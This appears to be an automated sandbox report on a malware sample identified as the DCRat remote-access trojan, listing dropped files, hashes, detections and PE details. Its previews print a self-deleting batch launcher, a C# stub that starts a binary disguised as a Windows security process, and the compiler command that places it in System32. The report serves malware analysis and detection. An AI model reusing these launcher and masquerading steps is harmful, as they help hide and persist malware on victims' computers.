                                                          SHA1:D9FD34C452DBF66B7C1A9B7862DABB6D7FE86579
                                                          SHA-256:1A9F42981A951017FF42A89B97D5F093D08A082A9FF1E510BEAEC5EF3799113A
                                                          SHA-512:7540BACBC6556800963AD0956B371EBDBD9D3CE7C48536DB127C76ADD26BAA48B08345C51517F6CF26856A484AB56D1DA957E7B66EF44770785AA7707622F2C1
                                                          Malicious:false
                                                          Preview:L......g.............debug$S........@...................@..B.rsrc$01................l...........@..@.rsrc$02........p...................@..@........<....c:\Windows\System32\CSC623D5433D49749E7B14E19B0BB4799F.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES6FF6.tmp.-.<....................a..Microsoft (R) CVTRES.g.=..cwd.C:\ProviderserverruntimeperfSvc.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):230
                                                          Entropy (8bit):5.03591247584877
                                                          Encrypted:false
                                                          SSDEEP:6:hCijTg3Nou1SV+DEclRROnGdovKOZG1wkn23f7:HTg9uYDEcl8fT
                                                          MD5:987E794F620663EB65B978E8B025BD94
                                                          SHA1:7BC95AFEDA04BFD1A9494D3AAB15177F89DC8A33
                                                          SHA-256:AAD3DA1CF5D9CACB3815FF3EB0B9243EFD82C5EED5F42F98090A899246F2AAB1
                                                          SHA-512:9C679D7AFA1BE3864AEDD8E02D8AB4E8BAFACA3083A2DDAA9999C982649D23DC20998016F0BA0583791FD3E916FF5296B2FF65D58C0881202B70C89F9085BA23
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\e6UaCnhMlp.bat"
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):389
                                                          Entropy (8bit):4.889157992805911
                                                          Encrypted:false
                                                          SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6YlL9aiFkD:JNVQIbSfhV7TiFkMSfhWYl57FkD
                                                          MD5:357EE34872239C0D304B223557389EF2
                                                          SHA1:D29E328E171F7CB31F4EB3B8D1E324182CE02BEB
                                                          SHA-256:8B52D3FF5E3E10D8A2552CF37324A612B7B002D264C8B6A51680A636162719FE
                                                          SHA-512:9F6B5AE953A79911E428533FCF455910D2CD9B1470E48A9D6C9893E3A3E9E06ABD4E828B5913CE6270239A5CF18F27FDE07672F8AAE5AE556851C286A96C038F
                                                          Malicious:false
                                                          Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\ProviderserverruntimeperfSvc\ctfmon.exe"); } catch { } }).Start();. }.}.
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):250
                                                          Entropy (8bit):5.086430811510847
                                                          Encrypted:false
                                                          SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23fWM:Hu7L//TRq79cQWf+M
                                                          MD5:BCCF70A721A1B30E34C52B9AA45E1E27
                                                          SHA1:8BBCBB6D2CCCB6F351165057357E46D4FB41314D
                                                          SHA-256:2313E41E1B0E628FAC8A9528B1115D454715F5B144F3420B1D7829804AAAA128
                                                          SHA-512:DB0C32B40F67A3CA23A108DDB8D903E8754A3A1F4C3490F45512B7C6F289F6188E5715ED094712AAD91FEE1328C42B003B261B514A449577562037E863BB0271
                                                          Malicious:true
                                                          Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.0.cs"
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (338), with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):759
                                                          Entropy (8bit):5.262595498418728
                                                          Encrypted:false
                                                          SSDEEP:12:vIljI/u7L//TRq79cQWf+5KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:gljI/un/Vq79tWf8Kax5DqBVKVrdFAMb
                                                          MD5:98094F46CA6EE6CF407D00259EFD7567
                                                          SHA1:0B7B8F106BD4EA3D6F0EF5F4B5C3498C59977E25
                                                          SHA-256:F47E661AB92DEF9BCED257FE90FB034B51088E007E1D00346742FF3A24528CD3
                                                          SHA-512:CFAA6261F8A8075718335B6DB7E6668A1DDCBC400656B7665288E3C23449EE8A422984A29406A4FB85765E71BADD89AC52AF16AC9E0D2EB3BD8790617C74DD41
                                                          Malicious:false
                                                          Preview:.C:\ProviderserverruntimeperfSvc> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):69632
                                                          Entropy (8bit):5.932541123129161
                                                          Encrypted:false
                                                          SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                          MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                          SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                          SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                          SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 50%
                                                          Joe Sandbox View:
                                                          • Filename: DCobxod.exe, Detection: malicious
                                                          • Filename: fatality.exe, Detection: malicious
                                                          • Filename: NursultanAlphaCrack.bat.exe, Detection: malicious
                                                          • Filename: SearchIndexer.exe, Detection: malicious
                                                          • Filename: fatality.exe, Detection: malicious
                                                          • Filename: OneDriveStandaloneUpdater.exe, Detection: malicious
                                                          • Filename: 85D5ktqjpd.exe, Detection: malicious
                                                          • Filename: VIyu4dC9CU.exe, Detection: malicious
                                                          • Filename: top.exe, Detection: malicious
                                                          • Filename: DC86.exe, Detection: malicious
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):85504
                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32256
                                                          Entropy (8bit):5.631194486392901
                                                          Encrypted:false
                                                          SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                          MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                          SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                          SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                          SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 25%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 38%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):5.645950918301459
                                                          Encrypted:false
                                                          SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                          MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                          SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                          SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                          SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1224
                                                          Entropy (8bit):4.435108676655666
                                                          Encrypted:false
                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                          Malicious:false
                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.9402085817995536
                                                          Encrypted:false
                                                          SSDEEP:48:6NrprPtxM7Jt8Bs3FJsdcV4MKe277aLvqBHOOulajfqXSfbNtm:S5PwPc+Vx9MGvkocjRzNt
                                                          MD5:8726A1715F384FB3A3BAC67D28D0B1A2
                                                          SHA1:DEDE51E4264CAB352FE8387FA60D0FA768B36AB6
                                                          SHA-256:D265D6D654E0E62AA6CBF5F7A0DD021B045ED243F6D44344784E17414D75B65C
                                                          SHA-512:2FA8C153E380249962D4BB7BE7D9F0A4DF5D9AA885FAFB512C39AB9C0A56AF50A947D74FC906CACCC80BADAEBF2F7DD233E0C4095DBB3BE127147EF26D6408F6
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................L'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..$.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):844800
                                                          Entropy (8bit):5.462969450133416
                                                          Encrypted:false
                                                          SSDEEP:12288:jVTnKIxG7yLfHB7cymJJMA+bpW3Ari4VVyZC0+1cw2jINofMVbZZ6:jVTney9cyQJMA+b3iE0nHA6
                                                          MD5:CE09DB6ADEECA051FF01ABD8CF2E400D
                                                          SHA1:14E60E202C180152757A89D13D9989EC35E1F5A2
                                                          SHA-256:AD372EDD698062A90F4744DA16F88CC5BB45CA9B1CB70FC7350673D293F2BC16
                                                          SHA-512:E80449CDE93D19790E64C1FE24AF1AEB00A3C392B4D57A529205A2339BBAA675B6EE21D2D068D65EF21C37D23D2F1B8B458706068FFE850410DC290C4D5C0CE3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Windows\debug\backgroundTaskHost.exe, Author: Joe Security
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 78%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..g............................n.... ........@.. .......................@............@.....................................S....... .................... ....................................................... ............... ..H............text...t.... ...................... ..`.rsrc... ...........................@..@.reloc....... ......................@..B................P.......H.......X....0......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                          Process:C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exe
                                                          File Type:ASCII text, with very long lines (611), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):611
                                                          Entropy (8bit):5.873529907204493
                                                          Encrypted:false
                                                          SSDEEP:12:+mTuwWxXsqEbfrjsuvk8akI3WeXGy+y5Vz6ODoSw2dDARBBg9u:+Eu7Xs5ns0C3XGiPz6Xd54u
                                                          MD5:8915B7FA8C6C22C77B62317580FA116B
                                                          SHA1:627C9E4B26A3F5D96737324193D2ED8CE3628445
                                                          SHA-256:78304BEE8A0CF11CCE7AA71EF36E5243000EE93A2C86EE6E818FA23489FAF70A
                                                          SHA-512:FFB88EFDD188F1C3A9E35180A09B4F9A200B190EF5F9A2CDA5143A7C0F676DDF233586E7BF1C5DEE94D9FAD4FBA2EDD1E9B48F4B3EB5C491D6A7C73451DF693A
                                                          Malicious:false
                                                          Preview:
                                                          Process:C:\Windows\System32\w32tm.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.79541265743596
                                                          Encrypted:false
                                                          SSDEEP:3:VLV993J+miJWEoJ8FXAQvdZLPRJ6qvpj8XKvj:Vx993DEUps3N
                                                          MD5:45D2DBCE65789EF39FEE6B597E4F136B
                                                          SHA1:194224AC3066B8D5603CBD1237778785F68170A6
                                                          SHA-256:26F55C149122FCA3044605664889DC4080147CC2A4B625DE8B06D4BD6A127484
                                                          SHA-512:47290C7D8FE6877BD2455A25C817B527CE3C4FB7C3AC9AA544CB8210D787A3F024CE5E8E923728079188A63BE25D5531E8CB41DB420F2ECB74CF6E1BBD867FB3
                                                          Malicious:false
                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 13/01/2025 08:27:05..08:27:05, error: 0x80072746.08:27:10, error: 0x80072746.
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):5.984535183531347
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:SPISOK_DENEG.exe
                                                          File size:1'166'640 bytes
                                                          MD5:490aa1e56fab47858d780a9fdbafb5bf
                                                          SHA1:337d8c93caf41a62f0720ae1f0c02d262ac0a274
                                                          SHA256:595fab3363e5c90ecf3f7375a0b82d996c96b6a0307ad31e6d79dde07eeb8595
                                                          SHA512:7ff8f6983c789f78f67063745fef92040bb5cb88463e82f6a9f05ba0b48021bd2c541cec6e06726748547f0800abd14dd52fe798feddcb1427a46b87619a4f00
                                                          SSDEEP:24576:2TbBv5rUyXV0VTney9cyQJMA+b3iE0nHA6E:IBJgTney9clmA+b3KHe
                                                          TLSH:E0452A182AEE143AF0B3AFB14BD47846D5AEF9737B1E958D14C103CA8612740DE9673B
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                          Icon Hash:1515d4d4442f2d2d
                                                          Entrypoint:0x41f530
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                          Instruction
                                                          call 00007FBCDCE7C39Bh
                                                          jmp 00007FBCDCE7BCADh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          push dword ptr [ebp+08h]
                                                          mov esi, ecx
                                                          call 00007FBCDCE6EAF7h
                                                          mov dword ptr [esi], 004356D0h
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          and dword ptr [ecx+04h], 00000000h
                                                          mov eax, ecx
                                                          and dword ptr [ecx+08h], 00000000h
                                                          mov dword ptr [ecx+04h], 004356D8h
                                                          mov dword ptr [ecx], 004356D0h
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          push esi
                                                          mov esi, ecx
                                                          lea eax, dword ptr [esi+04h]
                                                          mov dword ptr [esi], 004356B8h
                                                          push eax
                                                          call 00007FBCDCE7F13Fh
                                                          test byte ptr [ebp+08h], 00000001h
                                                          pop ecx
                                                          je 00007FBCDCE7BE3Ch
                                                          push 0000000Ch
                                                          push esi
                                                          call 00007FBCDCE7B3F9h
                                                          pop ecx
                                                          pop ecx
                                                          mov eax, esi
                                                          pop esi
                                                          pop ebp
                                                          retn 0004h
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007FBCDCE6EA72h
                                                          push 0043BEF0h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007FBCDCE7EBF9h
                                                          int3
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007FBCDCE7BDB8h
                                                          push 0043C0F4h
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007FBCDCE7EBDCh
                                                          int3
                                                          jmp 00007FBCDCE80677h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push 00422900h
                                                          push dword ptr fs:[00000000h]
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          Data Directories (Name, Virtual Address, Virtual Size, Is in Section):
                                                          • Name: IMAGE_DIRECTORY_ENTRY_EXPORT, Virtual Address: 0x3d070, Virtual Size: 0x34, Is in Section: .rdata
                                                          • Name: IMAGE_DIRECTORY_ENTRY_IMPORT, Virtual Address: 0x3d0a4, Virtual Size: 0x50, Is in Section: .rdata
                                                          • Name: IMAGE_DIRECTORY_ENTRY_RESOURCE, Virtual Address: 0x64000, Virtual Size: 0xdff8, Is in Section: .rsrc
                                                          • Name: IMAGE_DIRECTORY_ENTRY_EXCEPTION, Virtual Address: 0x0, Virtual Size: 0x0, Is in Section:
                                                          • Name: IMAGE_DIRECTORY_ENTRY_SECURITY, Virtual Address: 0x0, Virtual Size: 0x0, Is in Section:
                                                          • Name: IMAGE_DIRECTORY_ENTRY_BASERELOC, Virtual Address: 0x72000, Virtual Size: 0x233c, Is in Section: .reloc
                                                          • Name: IMAGE_DIRECTORY_ENTRY_DEBUG, Virtual Address: 0x3b11c, Virtual Size: 0x54, Is in Section: .rdata
                                                          • Name: IMAGE_DIRECTORY_ENTRY_COPYRIGHT, Virtual Address: 0x0, Virtual Size: 0x0, Is in Section:
                                                          • Name: IMAGE_DIRECTORY_ENTRY_GLOBALPTR, Virtual Address: 0x0, Virtual Size: 0x0, Is in Section:
                                                          • Name: IMAGE_DIRECTORY_ENTRY_TLS, Virtual Address: 0x0, Virtual Size: 0x0, Is in Section:
                                                          • Name: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG, Virtual Address: 0x355f8, Virtual Size: 0x40, Is in Section: .rdata
                                                          • Name: IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT, Virtual Address: 0x0, Virtual Size: 0x0, Is in Section:
                                                          • Name: IMAGE_DIRECTORY_ENTRY_IAT, Virtual Address: 0x33000, Virtual Size: 0x278, Is in Section: .rdata
                                                          • Name: IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, Virtual Address: 0x3c5ec, Virtual Size: 0x120, Is in Section: .rdata
                                                          • Name: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, Virtual Address: 0x0, Virtual Size: 0x0, Is in Section:
                                                          • Name: IMAGE_DIRECTORY_ENTRY_RESERVED, Virtual Address: 0x0, Virtual Size: 0x0, Is in Section:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
